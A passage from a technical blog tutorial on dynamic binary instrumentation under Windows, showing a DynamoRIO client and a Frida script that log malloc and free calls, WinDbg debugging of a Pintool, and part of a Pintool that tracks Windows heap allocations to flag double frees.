Additionally, we include the headers for the extensions mentioned above, that is, drmgr.h and drwrap.h. We’ll write the output of this DynamoRIO client to a text file, hence the fstream include. I won’t use a container in this example to keep track of the memory allocations. You can just copy and paste that functionality from the Pintool above with slight modifications, so I’ll leave that for you as an exercise. In this example, we’ll simply log malloc and free calls to demonstrate how to use the DynamoRIO API to accomplish the same as before, where we used Pin.

Then, we have the function declarations and some global variables.

static void event_exit(void);
static void wrap_malloc_pre(void *wrapcxt, OUT void **user_data);
static void wrap_malloc_post(void *wrapcxt, void *user_data);
static void wrap_free_pre(void *wrapcxt, OUT void **user_data);

ofstream LogFile;
#define MALLOC_ROUTINE_NAME "malloc"
#define FREE_ROUTINE_NAME "free"

These #defines are purely cosmetic; we could have used them in our Pintool too. We didn’t, simply because we don’t have to. Feel free to adopt the style you want. I built this example on top of this one, so I ended up using more or less the same “style”. If you plan to port your client or Pintool to other platforms, this can be considered a good practice because it will make the changes easier.

Next, we have a function called module_load_event, which is a callback function registered by drmgr_register_module_load_event. DynamoRIO will call this function whenever the application loads a module. As you can see, this is not that different from Pin.
static void module_load_event(void *drcontext, const module_data_t *mod, bool loaded)
{
    app_pc towrap = (app_pc)dr_get_proc_address(mod->handle, MALLOC_ROUTINE_NAME);
    if (towrap != NULL)
    {
        bool ok = drwrap_wrap(towrap, wrap_malloc_pre, wrap_malloc_post);

        if (!ok)
        {
            dr_fprintf(STDERR, "[-] Could not wrap 'malloc': already wrapped?\n");
            DR_ASSERT(ok);
        }
    }

    towrap = (app_pc)dr_get_proc_address(mod->handle, FREE_ROUTINE_NAME);
    if (towrap != NULL)
    {
        bool ok = drwrap_wrap(towrap, wrap_free_pre, NULL);

        if (!ok)
        {
            dr_fprintf(STDERR, "[-] Could not wrap 'free': already wrapped?\n");
            DR_ASSERT(ok);
        }
    }
}

As we can see above, we use dr_get_proc_address to get the entry point of malloc. If it doesn’t return NULL (which signals failure), we use drwrap_wrap to wrap the application function, so that wrap_malloc_pre() is called prior to every invocation of the original function (malloc) and wrap_malloc_post() is called after every invocation. Again, conceptually, this is very close to what we did with Pin. We do the same with free. However, as stated before, we are only interested in the free parameter and not its return value, so we only wrap the free call prior to every invocation (wrap_free_pre). Since we don’t care about its return value, we just pass NULL as the third parameter to drwrap_wrap. With drwrap_wrap one of the callbacks can be NULL, but not both.

We then have dr_client_main, which is, let’s say, our main function. DynamoRIO looks up dr_client_main in each client library and calls that function when the process starts. We have a pretty common “main”, with calls to dr_set_client_name (which sets information presented to users in diagnostic messages), dr_log (which simply writes to DynamoRIO’s log file), and a couple of functions whose purpose you can guess from their names. Additionally, drmgr_init and drwrap_init initialize the respective extensions.
The dr_register_exit_event call is pretty much the same as Pin’s PIN_AddFiniFunction: it registers a function to be executed immediately before the application exits. Lastly, we have the call to drmgr_register_module_load_event that we already mentioned above.

DR_EXPORT void dr_client_main(client_id_t id, int argc, const char *argv[])
{
    LogFile.open("memprofile.out");

    dr_set_client_name("DynamoRIO Sample Client 'wrap'", "http://dynamorio.org/issues");
    dr_log(NULL, LOG_ALL, 1, "Client 'wrap' initializing\n");

    if (dr_is_notify_on())
    {
        dr_enable_console_printing();
        dr_fprintf(STDERR, "[*] Client wrap is running\n");
    }

    drmgr_init();
    drwrap_init();
    dr_register_exit_event(event_exit);
    drmgr_register_module_load_event(module_load_event);
}

Next is the function to be executed immediately before the application exits. Nothing special here.

static void event_exit(void)
{
    drwrap_exit();
    drmgr_exit();
}

And lastly, the callback functions already mentioned before. What’s relevant here? First, the call to drwrap_get_arg, which, as we can guess, “Returns the value of the arg-th argument (0-based) to the wrapped function represented by wrapcxt. Assumes the regular C calling convention (i.e., no fastcall). May only be called from a drwrap_wrap pre-function callback. To access argument values in a post-function callback, store them in the user_data parameter passed between the pre and post functions.” Second, the call to drwrap_get_retval, which returns the return value of the wrapped function.
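The hand-off through user_data mentioned in the quote can be imitated without DynamoRIO. The following is a minimal sketch in plain C++: PreHook, PostHook, traced_malloc, and the trace stream are hypothetical stand-ins that only imitate the shape of the pre and post callbacks; they are not DynamoRIO APIs.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdlib>
#include <sstream>

// Stand-ins that imitate the shape of pre/post callbacks (NOT the DynamoRIO API).
using PreHook = void (*)(std::size_t size, void **user_data);
using PostHook = void (*)(void *retval, void *user_data);

std::ostringstream trace;  // stands in for the log file

// Pre-hook: the argument is visible here, so stash it for the post-hook.
void malloc_pre(std::size_t size, void **user_data) {
    *user_data = reinterpret_cast<void *>(static_cast<std::uintptr_t>(size));
}

// Post-hook: only the return value is visible; the size comes from user_data.
void malloc_post(void *retval, void *user_data) {
    auto size = static_cast<std::size_t>(reinterpret_cast<std::uintptr_t>(user_data));
    trace << "malloc(" << size << ") -> " << (retval != nullptr ? "ok" : "NULL") << "\n";
}

// Hypothetical driver playing the role of the wrapping engine:
// pre-hook, original function, then post-hook with the same user_data.
void *traced_malloc(std::size_t size, PreHook pre, PostHook post) {
    void *user_data = nullptr;
    pre(size, &user_data);
    void *result = std::malloc(size);
    post(result, user_data);
    return result;
}
```

In the real client the same idea would apply to wrap_malloc_pre and wrap_malloc_post, which already receive the user_data parameters needed for it.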
static void wrap_malloc_pre(void *wrapcxt, OUT void **user_data) { /* malloc(size) or HeapAlloc(heap, flags, size) */ //size_t sz = (size_t)drwrap_get_arg(wrapcxt, 2); // HeapAlloc size_t sz = (size_t)drwrap_get_arg(wrapcxt, 0); // malloc LogFile << "[*] malloc(" << dec << sz << ")"; // log the malloc size } static void wrap_malloc_post(void *wrapcxt, void *user_data) { int actual_read = (int)(ptr_int_t)drwrap_get_retval(wrapcxt); LogFile << "\t\t= 0x" << hex << actual_read << endl; } static void wrap_free_pre(void *wrapcxt, OUT void **user_data) { int addr = (int)drwrap_get_arg(wrapcxt, 0); LogFile << "[*] free(0x" << hex << addr << ")" << endl; } Very simple, and not that different from what we have seen before with Pin. The whole DynamoRIO client code is below. You can also get the whole Visual Studio project from GitHub here. #include "stdafx.h" #include <fstream> #include "dr_api.h" #include "drmgr.h" #include "drwrap.h" using namespace std; static void event_exit(void); static void wrap_malloc_pre(void *wrapcxt, OUT void **user_data); static void wrap_malloc_post(void *wrapcxt, void *user_data); static void wrap_free_pre(void *wrapcxt, OUT void **user_data); ofstream LogFile; #define MALLOC_ROUTINE_NAME "malloc" #define FREE_ROUTINE_NAME "free" static void module_load_event(void *drcontext, const module_data_t *mod, bool loaded) { app_pc towrap = (app_pc)dr_get_proc_address(mod->handle, MALLOC_ROUTINE_NAME); if (towrap != NULL) { bool ok = drwrap_wrap(towrap, wrap_malloc_pre, wrap_malloc_post); if (!ok) { dr_fprintf(STDERR, "[-] Could not wrap 'malloc': already wrapped?\n"); DR_ASSERT(ok); } } towrap = (app_pc)dr_get_proc_address(mod->handle, FREE_ROUTINE_NAME); if (towrap != NULL) { bool ok = drwrap_wrap(towrap, wrap_free_pre, NULL); if (!ok) { dr_fprintf(STDERR, "[-] Could not wrap 'free': already wrapped?\n"); DR_ASSERT(ok); } } } DR_EXPORT void dr_client_main(client_id_t id, int argc, const char *argv[]) { LogFile.open("memprofile.out"); 
    dr_set_client_name("DynamoRIO Sample Client 'wrap'", "http://dynamorio.org/issues");
    dr_log(NULL, LOG_ALL, 1, "Client 'wrap' initializing\n");

    if (dr_is_notify_on())
    {
        dr_enable_console_printing();
        dr_fprintf(STDERR, "[*] Client wrap is running\n");
    }

    drmgr_init();
    drwrap_init();
    dr_register_exit_event(event_exit);
    drmgr_register_module_load_event(module_load_event);
}

static void event_exit(void)
{
    drwrap_exit();
    drmgr_exit();
}

static void wrap_malloc_pre(void *wrapcxt, OUT void **user_data)
{
    /* malloc(size) or HeapAlloc(heap, flags, size) */
    //size_t sz = (size_t)drwrap_get_arg(wrapcxt, 2); // HeapAlloc
    size_t sz = (size_t)drwrap_get_arg(wrapcxt, 0); // malloc

    LogFile << "[*] malloc(" << dec << sz << ")"; // log the malloc size
}

static void wrap_malloc_post(void *wrapcxt, void *user_data)
{
    int actual_read = (int)(ptr_int_t)drwrap_get_retval(wrapcxt);
    LogFile << "\t\t= 0x" << hex << actual_read << endl;
}

static void wrap_free_pre(void *wrapcxt, OUT void **user_data)
{
    int addr = (int)drwrap_get_arg(wrapcxt, 0);
    LogFile << "[*] free(0x" << hex << addr << ")" << endl;
}

If you run it against our ExercisePin.exe binary (see the section Target/Guest Program), you get the following.

C:\dynamorio\bin32>drrun.exe -client "C:\Users\bob\Desktop\WRKDIR\MallocWrap\Release\MallocWrap.dll" 0 "" c:\Users\bob\Desktop\ExercisePin.exe
[*] Client wrap is running
done
C:\dynamorio\bin32>type memprofile.out
[*] free(0x0)
[*] malloc(2) = 0x5a35d0
[*] malloc(128) = 0x5a9c50
[*] malloc(128) = 0x5a9cd8
[*] malloc(128) = 0x5a9d60
[*] free(0x5a9c50)
[*] free(0x5a9d60)
[*] malloc(2) = 0x5a34e0

We can extend this program to get the exact same functionality as our Pintool and check for memory corruption bugs instead of only logging the calls. I’ll leave that as an exercise for you.

Basic Frida script (MallocLogger)

Frida is a fast-growing DBI framework, mainly used on mobile devices.
I haven’t played much with mobile applications in a long time (though that’s about to change). Still, I wanted to give Frida a try because I heard good things about it, and it also supports Windows. The interesting part here is that Frida injects a JavaScript interpreter into the target/guest program. So, instead of writing C code, we’ll be writing JavaScript to instrument our program (actually, if we want we can also use C or Swift). You can see this as an advantage or a disadvantage. If you are a vulnerability hunter and you like to poke around browsers, then this should be an advantage, I guess. It’s actually very interesting that we are writing instrumentation code to manipulate low-level instructions by using a high-level language. You can find the JavaScript API here.

Anyway, the use case will be exactly the same as the ones we saw before. While the instrumentation code has to be written in JavaScript (well, again, that’s not strictly true, but let’s use JavaScript because it’s cool), the resulting tools can be written in either Python or JavaScript. We’ll use Frida’s Interceptor to trace all malloc and free calls for a start. The target will be our ExercisePin.exe binary again. We’ll also try to create an output close to the one of our basic MallocTracer Pintool and MallocWrap DynamoRIO client, which means we’ll log the amount of memory requested, the address returned by malloc, and the argument of free. Here’s the sample MallocLogger.py Python script.

#!/usr/bin/env python
import frida
import sys

pid = frida.spawn(['ExercisePin.exe'])
session = frida.attach(pid)

contents = open('mallocLogger.js').read()
script = session.create_script(contents)
script.load()
frida.resume(pid)
sys.stdin.read()

And below is the instrumentation JavaScript file, MallocLogger.js.
// Interceptor for 'malloc'
Interceptor.attach(Module.findExportByName(null, 'malloc'),
    {
      // Log before malloc
      onEnter: function (args) {
        console.log("malloc(" + args[0].toInt32() + ")");
      },
      // Log after malloc
      onLeave: function (retval) {
        console.log("\t\t= 0x" + retval.toString(16));
      }
    });

// Interceptor for 'free'
Interceptor.attach(Module.findExportByName(null, 'free'),
    {
      onEnter: function (args) {
        console.log("free(0x" + args[0].toString(16) + ")");
      }
    });

If we run this Python script, we get something like this.

C:\Users\bob\Desktop\frida>python MallocLogger.py
free(0x0)
malloc(2) = 0x984268
malloc(128) = 0x9856d8
malloc(128) = 0x985760
malloc(128) = 0x9857e8
done
free(0x9856d8)
free(0x9857e8)
malloc(2) = 0x984278

Interestingly enough, Frida also comes with a utility, frida-trace.exe, that pretty much allows us to do the exact same thing we did above while writing almost no code (besides adding a bit more information and tweaking the output).

C:\Users\bob\Desktop\frida>frida-trace -i malloc -i free .\ExercisePin.exe
Instrumenting functions...
malloc: Auto-generated handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\msvcrt.dll\malloc.js"
malloc: Auto-generated handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\ucrtbase.DLL\malloc.js"
free: Auto-generated handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\msvcrt.dll\free.js"
free: Auto-generated handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\ucrtbase.DLL\free.js"
Started tracing 4 functions. Press Ctrl+C to stop.
done
           /* TID 0x1f84 */
   125 ms  free()
   125 ms  malloc()
   125 ms  malloc()
   125 ms  malloc()
   125 ms  malloc()
   125 ms  free()
   125 ms  free()
   125 ms  malloc()
Process terminated

If you look at the output above, you can see that some JavaScript handlers were auto-generated. We can just tweak this JavaScript code to make the output look as before. If we open, for example, the file __handlers__\msvcrt.dll\malloc.js, we’ll see something like:

/*
 * Auto-generated by Frida.
Please modify to match the signature of malloc. * This stub is currently auto-generated from manpages when available. * * For full API reference, see: http://www.frida.re/docs/javascript-api/ */ { /** * Called synchronously when about to call malloc. * * @this {object} - Object allowing you to store state for use in onLeave. * @param {function} log - Call this function with a string to be presented to the user. * @param {array} args - Function arguments represented as an array of NativePointer objects. * For example use Memory.readUtf8String(args[0]) if the first argument is a pointer to a C string encoded as UTF-8. * It is also possible to modify arguments by assigning a NativePointer object to an element of this array. * @param {object} state - Object allowing you to keep state across function calls. * Only one JavaScript function will execute at a time, so do not worry about race-conditions. * However, do not use this to store function arguments across onEnter/onLeave, but instead * use "this" which is an object for keeping state local to an invocation. */ onEnter: function (log, args, state) { log("malloc()"); }, /** * Called synchronously when about to return from malloc. * * See onEnter for details. * * @this {object} - Object allowing you to access state stored in onEnter. * @param {function} log - Call this function with a string to be presented to the user. * @param {NativePointer} retval - Return value represented as a NativePointer object. * @param {object} state - Object allowing you to keep state across function calls. */ onLeave: function (log, retval, state) { } } We just need to tweak the onEnter and onLeave functions. For example. /* * Auto-generated by Frida. Please modify to match the signature of malloc. * This stub is currently auto-generated from manpages when available. * * For full API reference, see: http://www.frida.re/docs/javascript-api/ */ { /** * Called synchronously when about to call malloc. 
* * @this {object} - Object allowing you to store state for use in onLeave. * @param {function} log - Call this function with a string to be presented to the user. * @param {array} args - Function arguments represented as an array of NativePointer objects. * For example use Memory.readUtf8String(args[0]) if the first argument is a pointer to a C string encoded as UTF-8. * It is also possible to modify arguments by assigning a NativePointer object to an element of this array. * @param {object} state - Object allowing you to keep state across function calls. * Only one JavaScript function will execute at a time, so do not worry about race-conditions. * However, do not use this to store function arguments across onEnter/onLeave, but instead * use "this" which is an object for keeping state local to an invocation. */ onEnter: function (log, args, state) { log("malloc(" + args[0].toInt32() + ")"); }, /** * Called synchronously when about to return from malloc. * * See onEnter for details. * * @this {object} - Object allowing you to access state stored in onEnter. * @param {function} log - Call this function with a string to be presented to the user. * @param {NativePointer} retval - Return value represented as a NativePointer object. * @param {object} state - Object allowing you to keep state across function calls. */ onLeave: function (log, retval, state) { log("\t\t= 0x" + retval.toString(16)); } } Now, if we run again the exact same command as before we’ll get the following. C:\Users\bob\Desktop\frida>frida-trace -i malloc -i free .\ExercisePin.exe Instrumenting functions... malloc: Loaded handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\msvcrt.dll\malloc.js" malloc: Loaded handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\ucrtbase.DLL\malloc.js" free: Loaded handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\msvcrt.dll\free.js" free: Loaded handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\ucrtbase.DLL\free.js" Started tracing 4 functions. 
Press Ctrl+C to stop.
done
           /* TID 0x23e4 */
    64 ms  free(0x0)
    64 ms  malloc(2)
    64 ms  = 0x8a42a8
    64 ms  malloc(128)
    64 ms  = 0x8a57a0
    64 ms  malloc(128)
    64 ms  = 0x8a5828
    64 ms  malloc(128)
    64 ms  = 0x8a58b0
    64 ms  free(0x8a57a0)
    64 ms  free(0x8a58b0)
    65 ms  malloc(2)
    65 ms  = 0x8a42b8
Process terminated

We can extend this program to get the exact same functionality as our Pintool, and check for memory corruption bugs instead of only logging the calls. I’ll leave that as an exercise for you.

Debugging

If you want to debug your Pintool, you should use the -pause_tool switch and specify the number of seconds to wait until you attach the debugger to its process, as shown below.

C:\pin\source\tools\MallocTracer\Release>c:\pin\pin.exe -pause_tool 20 -t "C:\pin\source\tools\MallocTracer\Release\MallocTracer.dll" -- ExercisePin.exe
Pausing for 20 seconds to attach to process with pid 1568

To debug the Pintool I actually don’t use Visual Studio; I prefer WinDbg because I’m used to it and it is awesome. Once you attach to the process with WinDbg, it’s very easy to set a breakpoint wherever you like in your Pintool. Below is just a simple example of setting a breakpoint in the main function of my Pintool.

Microsoft (R) Windows Debugger Version 10.0.17134.12 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: srv*
Executable search path is:
ModLoad: 00080000 00087000 C:\pin\source\tools\MallocTracer\Release\ExercisePin.exe
ModLoad: 77800000 77980000 C:\Windows\SysWOW64\ntdll.dll
ModLoad: 769d0000 76ae0000 C:\Windows\syswow64\kernel32.dll
ModLoad: 76b50000 76b97000 C:\Windows\syswow64\KERNELBASE.dll
Break-in sent, waiting 30 seconds...
ModLoad: 54c20000 54f93000 MallocTracer.dll
It is now possible to set breakpoints in Pin tool.
Use "Go" command (F5) to proceed.
(620.12c0): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=53833c8c ecx=76b6388e edx=00000000 esi=53833c8c edi=53833cb8 eip=76b6338d esp=01ad1930 ebp=0042e7e4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 KERNELBASE!DebugBreak+0x2: 76b6338d cc int 3 0:000> lmf start end module name 00080000 00087000 ExercisePin C:\pin\source\tools\MallocTracer\Release\ExercisePin.exe 54c20000 54f93000 MallocTracer MallocTracer.dll 769d0000 76ae0000 kernel32 C:\Windows\syswow64\kernel32.dll 76b50000 76b97000 KERNELBASE C:\Windows\syswow64\KERNELBASE.dll 77800000 77980000 ntdll C:\Windows\SysWOW64\ntdll.dll 0:000> lmDvmMallocTracer Browse full module list start end module name 54c20000 54f93000 MallocTracer (deferred) Image path: MallocTracer.dll Image name: MallocTracer.dll Browse all global symbols functions data Timestamp: Sat Jun 30 14:28:14 2018 (5B37F5EE) CheckSum: 00000000 ImageSize: 00373000 Translations: 0000.04b0 0000.04e4 0409.04b0 0409.04e4 Information from resource tables: 0:000> x /D /f MallocTracer!a* A B C D E F G H I J K L M N O P Q R S T U V W X Y Z *** WARNING: Unable to verify checksum for MallocTracer.dll 54c549b8 MallocTracer!ASM_pin_wow64_gate (<no parameter info>) 54c5483c MallocTracer!ATOMIC_Increment16 (<no parameter info>) 54c547d0 MallocTracer!ATOMIC_Swap8 (<no parameter info>) 54c54854 MallocTracer!ATOMIC_Increment32 (<no parameter info>) 54e28b64 MallocTracer!ADDRINT_AtomicInc (<no parameter info>) 54c35e20 MallocTracer!atexit (<no parameter info>) 54c547fc MallocTracer!ATOMIC_Swap32 (<no parameter info>) 54c54740 MallocTracer!ATOMIC_SpinDelay (<no parameter info>) 54c533c0 MallocTracer!ATOMIC::LIFO_PTR<LEVEL_BASE::SWMALLOC::FREE_LIST_ELEMENT,3,LEVEL_BASE::ATOMIC_STATS>::PopInternal (<no parameter info>) 54e1a2b0 MallocTracer!abort (<no parameter info>) 54c54810 MallocTracer!ATOMIC_Copy64 (<no parameter info>) 54c547e4 MallocTracer!ATOMIC_Swap16 (<no parameter info>) 54c41710 
MallocTracer!ATOMIC::LIFO_CTR<ATOMIC::FIXED_LIFO<LEVEL_BASE::LOCK_COMMAND *,1,32,ATOMIC::NULLSTATS>::ELEMENT,ATOMIC::FIXED_LIFO<LEVEL_BASE::LOCK_COMMAND *,1,32,ATOMIC::NULLSTATS>::ELEMENT_HEAP,1,32,unsigned __int64,ATOMIC::NULLSTATS>::Pop (<no parameter info>) 54c54824 MallocTracer!ATOMIC_Increment8 (<no parameter info>) 54c549bb MallocTracer!ASM_pin_wow64_gate_end (<no parameter info>) 54c5478c MallocTracer!ATOMIC_CompareAndSwap32 (<no parameter info>) 54c54750 MallocTracer!ATOMIC_CompareAndSwap8 (<no parameter info>) 54c41820 MallocTracer!ATOMIC::LIFO_CTR<ATOMIC::FIXED_LIFO<LEVEL_BASE::LOCK_COMMAND *,1,32,ATOMIC::NULLSTATS>::ELEMENT,ATOMIC::FIXED_LIFO<LEVEL_BASE::LOCK_COMMAND *,1,32,ATOMIC::NULLSTATS>::ELEMENT_HEAP,1,32,unsigned __int64,ATOMIC::NULLSTATS>::Push (<no parameter info>) 54c535a0 MallocTracer!ATOMIC::IDSET<7,LEVEL_BASE::ATOMIC_STATS>::ReleaseID (<no parameter info>) 54c547a8 MallocTracer!ATOMIC_CompareAndSwap64 (<no parameter info>) 54c3e660 MallocTracer!ATOMIC::EXPONENTIAL_BACKOFF<LEVEL_BASE::ATOMIC_STATS>::~EXPONENTIAL_BACKOFF<LEVEL_BASE::ATOMIC_STATS> (<no parameter info>) 54c5476c MallocTracer!ATOMIC_CompareAndSwap16 (<no parameter info>) 0:000> x /D /f MallocTracer!m* A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 54e21e20 MallocTracer!mbsinit (<no parameter info>) 54c6e450 MallocTracer!mmap (<no parameter info>) 54c3bb40 MallocTracer!malloc (<no parameter info>) 54e21db0 MallocTracer!memchr (<no parameter info>) 54e21e00 MallocTracer!mbrtowc (<no parameter info>) 54e26500 MallocTracer!mbrlen (<no parameter info>) 54e21e40 MallocTracer!mbsnrtowcs (<no parameter info>) 54e261b0 MallocTracer!mbrtoc32 (<no parameter info>) 54c38730 MallocTracer!main (<no parameter info>) 54e1a2f0 MallocTracer!memset (<no parameter info>) 54e26410 MallocTracer!mbstate_get_byte (<no parameter info>) 54e22010 MallocTracer!mbsrtowcs (<no parameter info>) 54e1a1a0 MallocTracer!memmove (<no parameter info>) 54e263e0 MallocTracer!mbstate_bytes_so_far (<no parameter 
info>)
54e1a2c0 MallocTracer!memcpy (<no parameter info>)
54c6e480 MallocTracer!munmap (<no parameter info>)
54e26420 MallocTracer!mbstate_set_byte (<no parameter info>)
0:000> bp 54c38730
0:000> g
Breakpoint 0 hit
eax=53833cb8 ebx=54f64000 ecx=00000000 edx=54f356c0 esi=54f6500a edi=54f65000
eip=54c38730 esp=01ad19f4 ebp=53833c8c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MallocTracer!main:
54c38730 55 push ebp

For DynamoRIO I’ll just point you to the official documentation, since the debugging process can be a bit more tricky. Check the documentation here.

Pintool (WinMallocTracer)

As mentioned in the beginning, this post is all about Windows, which means it doesn’t really make sense to be tracking malloc and/or free. If we want to play with “real” Windows applications, we need to trace the Windows Heap family of functions. It’s a good time to look again at the diagram shown before that illustrates the relationship of Windows API calls used to allocate process memory (from the book The Art of Memory Forensics).

If we want to make sure we’ll always “see” the memory allocations performed by Windows applications, we should be looking for RtlAllocateHeap, RtlReAllocateHeap, RtlFreeHeap, VirtualAllocEx, and VirtualFreeEx. The Pintool below looks at exactly these functions. If you play a bit with multiple applications, you’ll realize that to accomplish “our” goal of tracking memory allocations we’ll face a lot of challenges. The code below tries to overcome some of them. I won’t go into detail explaining the API calls used as I did before, mainly because they are mostly the same. I’ll leave the code here and you can go through it. Afterwards, I’ll simply mention some of the main differences compared to the basic Pintool presented before.
#include "pin.h"
#include <iostream>
#include <fstream>
#include <map>

// Maps an allocation address to its state: false = allocated, true = freed
map<ADDRINT, bool> MallocMap;
ofstream LogFile;
KNOB<string> LogFileName(KNOB_MODE_WRITEONCE, "pintool", "o", "memprofile.out", "Memory trace file name");
KNOB<string> EntryPoint(KNOB_MODE_WRITEONCE, "pintool", "entrypoint", "main", "Guest entry-point function");
KNOB<BOOL> EnumSymbols(KNOB_MODE_WRITEONCE, "pintool", "symbols", "0", "List Symbols");
BOOL start_trace = false;

VOID LogBeforeVirtualAlloc(ADDRINT size) {
    if (!start_trace)
        return;
    LogFile << "[*] VirtualAllocEx(" << dec << size << ")";
}

VOID LogAfterVirtualAlloc(ADDRINT addr) {
    if (!start_trace)
        return;
    if (addr == NULL) {
        cerr << "[-] Error: VirtualAllocEx() return value was NULL.";
        return;
    }
    map<ADDRINT, bool>::iterator it = MallocMap.find(addr);
    if (it != MallocMap.end()) {
        if (it->second)
            it->second = false;  // Address was freed before and is being reused
        else
            cerr << "[-] Error: allocating memory not freed!?!" << endl;
    } else {
        MallocMap.insert(pair<ADDRINT, bool>(addr, false));
        LogFile << "\t\t= 0x" << hex << addr << endl;
    }
}

VOID LogBeforeVirtualFree(ADDRINT addr) {
    if (!start_trace)
        return;
    map<ADDRINT, bool>::iterator it = MallocMap.find(addr);
    if (it != MallocMap.end()) {
        if (it->second)
            LogFile << "[*] Memory at address 0x" << hex << addr << " has been freed more than once (Double Free)." << endl;
        else {
            it->second = true;  // Mark it as freed
            LogFile << "[*] VirtualFreeEx(0x" << hex << addr << ")" << endl;
        }
    } else
        LogFile << "[*] Freeing unallocated memory at address 0x" << hex << addr << "." << endl;
}

VOID LogBeforeReAlloc(ADDRINT freed_addr, ADDRINT size) {
    if (!start_trace)
        return;
    // mark freed_addr as free
    map<ADDRINT, bool>::iterator it = MallocMap.find(freed_addr);
    if (it != MallocMap.end()) {
        it->second = true;
        LogFile << "[*] RtlHeapfree(0x" << hex << freed_addr << ") from RtlHeapRealloc()" << endl;
    } else
        LogFile << "[-] RtlHeapRealloc could not find addr to free??? - " << freed_addr << endl;
    LogFile << "[*] RtlHeapReAlloc(" << dec << size << ")";
}

VOID LogAfterReAlloc(ADDRINT addr) {
    if (!start_trace)
        return;
    if (addr == NULL)
        return;
    map<ADDRINT, bool>::iterator it = MallocMap.find(addr);
    if (it != MallocMap.end()) {
        if (it->second)
            it->second = false;
        else
            // it already exists because of the HeapAlloc, we don't need to insert... just log it
            LogFile << "\t\t= 0x" << hex << addr << endl;
    }
}

VOID LogBeforeMalloc(ADDRINT size) {
    if (!start_trace)
        return;
    LogFile << "[*] RtlAllocateHeap(" << dec << size << ")";
}

VOID LogAfterMalloc(ADDRINT addr) {
    if (!start_trace)
        return;
    if (addr == NULL) {
        cerr << "[-] Error: RtlAllocateHeap() return value was NULL.";
        return;
    }
    map<ADDRINT, bool>::iterator it = MallocMap.find(addr);
    if (it != MallocMap.end()) {
        if (it->second)
            it->second = false;
        else
            cerr << "[-] Error: allocating memory not freed!?!" << endl;
    } else {
        MallocMap.insert(pair<ADDRINT, bool>(addr, false));
        LogFile << "\t\t= 0x" << hex << addr << endl;
    }
}

VOID LogFree(ADDRINT addr) {
    if (!start_trace)
        return;
    map<ADDRINT, bool>::iterator it = MallocMap.find(addr);
    if (it != MallocMap.end()) {
        if (it->second)
            LogFile << "[*] Memory at address 0x" << hex << addr << " has been freed more than once (Double Free)." << endl;
        else {
            it->second = true;  // Mark it as freed
            LogFile << "[*] RtlFreeHeap(0x" << hex << addr << ")" << endl;
        }
    } else
        LogFile << "[*] Freeing unallocated memory at address 0x" << hex << addr << "." << endl;
}

// Tracing is only active between entry to and exit from the chosen entry-point function
VOID BeforeMain() { start_trace = true; }
VOID AfterMain() { start_trace = false; }

VOID CustomInstrumentation(IMG img, VOID *v) {
    for (SYM sym = IMG_RegsymHead(img); SYM_Valid(sym); sym = SYM_Next(sym)) {
        string undFuncName = PIN_UndecorateSymbolName(SYM_Name(sym), UNDECORATION_NAME_ONLY);
        if (EnumSymbols.Value()) {
            LogFile << "" << undFuncName << "" << endl;
            continue;
        }
        if (undFuncName == EntryPoint.Value().c_str()) {
            RTN allocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym));
            if (RTN_Valid(allocRtn)) {
                RTN_Open(allocRtn);
                RTN_InsertCall(allocRtn, IPOINT_BEFORE, (AFUNPTR)BeforeMain, IARG_END);
                RTN_InsertCall(allocRtn, IPOINT_AFTER, (AFUNPTR)AfterMain, IARG_END);
                RTN_Close(allocRtn);
            }
        }
        if (undFuncName == "RtlAllocateHeap") {
            RTN allocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym));
            if (RTN_Valid(allocRtn)) {
                RTN_Open(allocRtn);
                // Record RtlAllocateHeap size
                RTN_InsertCall(allocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeMalloc,
                    IARG_FUNCARG_ENTRYPOINT_VALUE, 2, IARG_END);
                // Record RtlAllocateHeap return address
                RTN_InsertCall(allocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterMalloc,
                    IARG_FUNCRET_EXITPOINT_VALUE, IARG_END);
                RTN_Close(allocRtn);
            }
        }
        if (undFuncName == "RtlReAllocateHeap") {
            RTN reallocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym));
            if (RTN_Valid(reallocRtn)) {
                RTN_Open(reallocRtn);
                // Record RtlReAllocateHeap freed_addr, size
                RTN_InsertCall(reallocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeReAlloc,
                    IARG_FUNCARG_ENTRYPOINT_VALUE, 2, IARG_FUNCARG_ENTRYPOINT_VALUE, 3, IARG_END);
                // Record RtlReAllocateHeap return address
                RTN_InsertCall(reallocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterReAlloc,
                    IARG_FUNCRET_EXITPOINT_VALUE, IARG_END);
                RTN_Close(reallocRtn);
            }
        }
        else if (undFuncName == "RtlFreeHeap") {
            RTN freeRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym));
            if (RTN_Valid(freeRtn)) {
                RTN_Open(freeRtn);
                RTN_InsertCall(freeRtn, IPOINT_BEFORE, (AFUNPTR)LogFree,
                    IARG_FUNCARG_ENTRYPOINT_VALUE, 2, IARG_END);
                RTN_Close(freeRtn);
            }
        }
        if (undFuncName == "VirtualAllocEx") {
            RTN vrallocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym));
            if (RTN_Valid(vrallocRtn)) {
                RTN_Open(vrallocRtn);
                RTN_InsertCall(vrallocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeVirtualAlloc,
                    IARG_FUNCARG_ENTRYPOINT_VALUE, 2, IARG_END);
